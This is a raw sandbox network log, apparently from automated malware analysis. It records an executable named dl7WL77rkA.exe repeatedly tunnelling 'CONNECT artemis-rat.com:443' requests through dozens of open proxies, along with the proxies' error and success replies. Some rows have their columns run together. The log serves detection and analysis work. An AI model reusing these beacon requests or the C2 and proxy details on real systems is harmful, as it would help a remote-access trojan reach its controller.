Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:47.319251060 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
1975192.168.2.55543093.190.24.1194433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:47.320334911 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1976192.168.2.55513551.79.87.14485333876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.340404034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.905214071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.595448017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.092767954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.889461040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.592714071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:58.405179977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:03.904928923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1977192.168.2.555293152.228.140.225517833876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.340405941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.092780113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.208009958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.405150890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.405215025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:59.498951912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:03.595184088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1978192.168.2.555223116.199.168.141453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.342180014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1979192.168.2.55532561.129.2.21280803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.400834084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:17.727495909 CET726INHTTP/1.1 502 Bad Gateway
                                                                                                                                                                                                                                                            Server: nginx/1.20.1
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:28:17 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 559
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx/1.20.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:19.431041956 CET726INHTTP/1.1 502 Bad Gateway
                                                                                                                                                                                                                                                            Server: nginx/1.20.1
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:28:17 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 559
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx/1.20.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Mar 11, 2024 03:31:21.474886894 CET | 726 | IN | HTTP/1.1 502 Bad Gateway
                                                                                                                                                                                                                                                            Server: nginx/1.20.1
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:28:17 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 559
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx/1.20.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Mar 11, 2024 03:31:25.563524008 CET | 726 | IN | HTTP/1.1 502 Bad Gateway
                                                                                                                                                                                                                                                            Server: nginx/1.20.1
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:28:17 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 559
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx/1.20.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Mar 11, 2024 03:31:33.731142998 CET | 726 | IN | HTTP/1.1 502 Bad Gateway
                                                                                                                                                                                                                                                            Server: nginx/1.20.1
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:28:17 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 559
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx/1.20.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Mar 11, 2024 03:31:50.084501028 CET | 726 | IN | HTTP/1.1 502 Bad Gateway
                                                                                                                                                                                                                                                            Server: nginx/1.20.1
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:28:17 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 559
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx/1.20.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            1980192.168.2.555326218.65.6.15031283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:47.401818991 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            1981192.168.2.55529945.11.95.16552123876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:47.401887894 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            1982192.168.2.555324185.101.16.52803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:47.402154922 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            1983192.168.2.555342191.243.46.30432413876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:47.402219057 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:48.202020884 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:49.217859983 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:51.214389086 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:54.048185110 CET | 19 | IN | HTTP/1.1 200 OK


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            1984192.168.2.555261139.59.1.1431283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.402223110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.953927040 CET28INHTTP/1.1 400 Bad Request


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1985192.168.2.55536191.189.177.18831283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.402472019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.723143101 CET1286INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: squid/5.7
                                                                                                                                                                                                                                                            Mime-Version: 1.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:47 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 3628
                                                                                                                                                                                                                                                            X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                                                                                                                                                                                            Vary: Accept-Language
                                                                                                                                                                                                                                                            Content-Language: en
                                                                                                                                                                                                                                                            X-Cache: MISS from lb1
                                                                                                                                                                                                                                                            X-Cache-Lookup: NONE from lb1:3128
                                                                                                                                                                                                                                                            Via: 1.1 lb1 (squid/5.7)
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2020 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1986192.168.2.555311103.156.232.8556783876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.402853012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1987192.168.2.555363116.254.100.165505363876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.413646936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1988192.168.2.555268103.242.119.88803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.413786888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.820102930 CET629INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:47 GMT
                                                                                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm="Authorization"
                                                                                                                                                                                                                                                            Content-Length: 415
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>407 Proxy Authentication Required</title></head><body><h1>Proxy Authentication Required</h1><p>This server could not verify that youare authorized to access the documentrequested. Either you supplied the wrongcredentials (e.g., bad password), or yourbrowser doesn't understand how to supplythe credentials required.</p></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1989192.168.2.555351212.108.155.20590903876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.413788080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1990192.168.2.555007124.163.236.5473023876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.417335033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1991192.168.2.555329110.16.77.10180823876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.420880079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.858644009 CET202INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                            Content-Length: 717
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:22:33 GMT
                                                                                                                                                                                                                                                            Expires: Mon, 11 Mar 2024 02:22:33 GMT
                                                                                                                                                                                                                                                            Server: Mikrotik HttpProxy
                                                                                                                                                                                                                                                            Proxy-Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1992192.168.2.555406104.16.105.106803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:47.474179029 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:47.628536940 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:47 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1993192.168.2.554241184.170.248.541453876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:47.475142956 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1994192.168.2.55511636.93.157.4956783876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:47.476219893 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1995192.168.2.55538013.59.156.16731283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:47.476480961 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
